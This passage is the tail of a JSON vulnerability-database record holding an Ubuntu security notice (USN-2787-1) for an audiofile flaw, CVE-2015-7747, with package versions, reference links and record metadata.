0.3.3-2ubuntu0.1\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2787-1\r\n CVE-2015-7747\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.10.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.14.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.3-2ubuntu0.1\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32652", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32652", "title": "[USN-2787-1] audiofile vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}